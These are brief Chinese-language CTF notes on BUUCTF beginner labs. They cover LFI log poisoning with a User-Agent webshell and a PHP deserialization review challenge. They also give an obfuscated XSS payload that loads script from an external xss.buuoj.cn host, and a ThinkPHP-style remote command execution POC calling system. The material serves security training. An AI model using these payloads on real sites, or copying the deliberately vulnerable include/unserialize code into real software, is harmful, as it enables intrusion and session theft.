文章目录
Basic
Linux Labs
ssh连接/目录下
BUU LFI COURSE 1
<?php
/**
* Created by PhpStorm.
* User: jinzhao
* Date: 2019/7/9
* Time: 7:07 AM
*/
highlight_file(__FILE__);
if(isset($_GET['file'])) {
$str = $_GET['file'];
include $_GET['file'];
}
文件包含
一句话插入ua头,会写入日志
将日志包含出来,webshell连接工具连接,flag在/目录下
Upload-Labs-Linux
upload-labs 靶场
BUU CODE REVIEW 1
https://github.com/glzjin/buusec_2019_code_review_1
https://blog.csdn.net/qq_45555226/article/details/110003144
<?php
/**
* Created by PhpStorm.
* User: jinzhao
* Date: 2019/10/6
* Time: 8:04 PM
*/
highlight_file(__FILE__);
class BUU {
public $correct = "";
public $input = "";
public function __destruct() {
try {
$this->correct = base64_encode(uniqid());
if($this->correct === $this->input) {
echo file_get_contents("/flag");
}
} catch (Exception $e) {
}
}
}
if($_GET['pleaseget'] === '1') {
if($_POST['pleasepost'] === '2') {
if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {
unserialize($_POST['obj']);
}
}
}
BUU BRUTE 1
数值爆破
BUU SQL COURSE 1
注入点
sqli-labs
sqli-labs 靶场
BUU UPLOAD COURSE 1
文件上传,本地包含
BUU BURP COURSE 1
xff 不行,用 X-Real-IP 头
BUU XSS COURSE 1
安恒的大佬赵师傅做过一期教程。
https://github.com/wpsec/xsser
http://xss.buuoj.cn/
https://www.bilibili.com/video/BV1XE411f7qT?from=search&seid=6094814016757224378
</textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.buuoj.cn%2F8sVXk7%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>
LFI Labs
LFI_labs 靶场
https://github.com/paralax/lfi-labs
PikaChu
皮卡丘靶场
https://github.com/zhuifengshaonianhanlu/pikachu
AWD-Test1
为本平台的 AWD 做准备。。。
glzjin/123456
POC
POST
s=whoami&_method=__construct&method=POST&filter[]=system
[Windows]Upload-Labs-Windows
upload-labs 靶场
XSS-Lab
https://github.com/rebo-rn/xss-lab